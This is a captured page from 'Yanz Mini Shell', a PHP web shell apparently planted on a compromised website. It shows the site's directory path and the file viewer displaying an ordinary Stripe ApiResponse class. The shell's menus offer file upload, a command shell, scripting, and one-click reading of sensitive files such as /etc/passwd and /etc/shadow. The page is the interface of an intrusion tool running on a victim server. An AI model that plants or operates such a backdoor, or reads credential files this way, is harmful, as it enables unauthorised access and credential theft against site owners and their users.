Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php namespace Stripe; use Stripe\Util\CaseInsensitiveArray; /** * Class ApiResponse * * @package Stripe */ class ApiResponse { /** * @var array|CaseInsensitiveArray|null */ public $headers; /** * @var string */ public $body; /** * @var array|null */ public $json; /** * @var int */ public $code; /** * @param string $body * @param integer $code * @param array|CaseInsensitiveArray|null $headers * @param array|null $json */ public function __construct($body, $code, $headers, $json) { $this->body = $body; $this->code = $code; $this->headers = $headers; $this->json = $json; } }
Free Space : 11794362368 Byte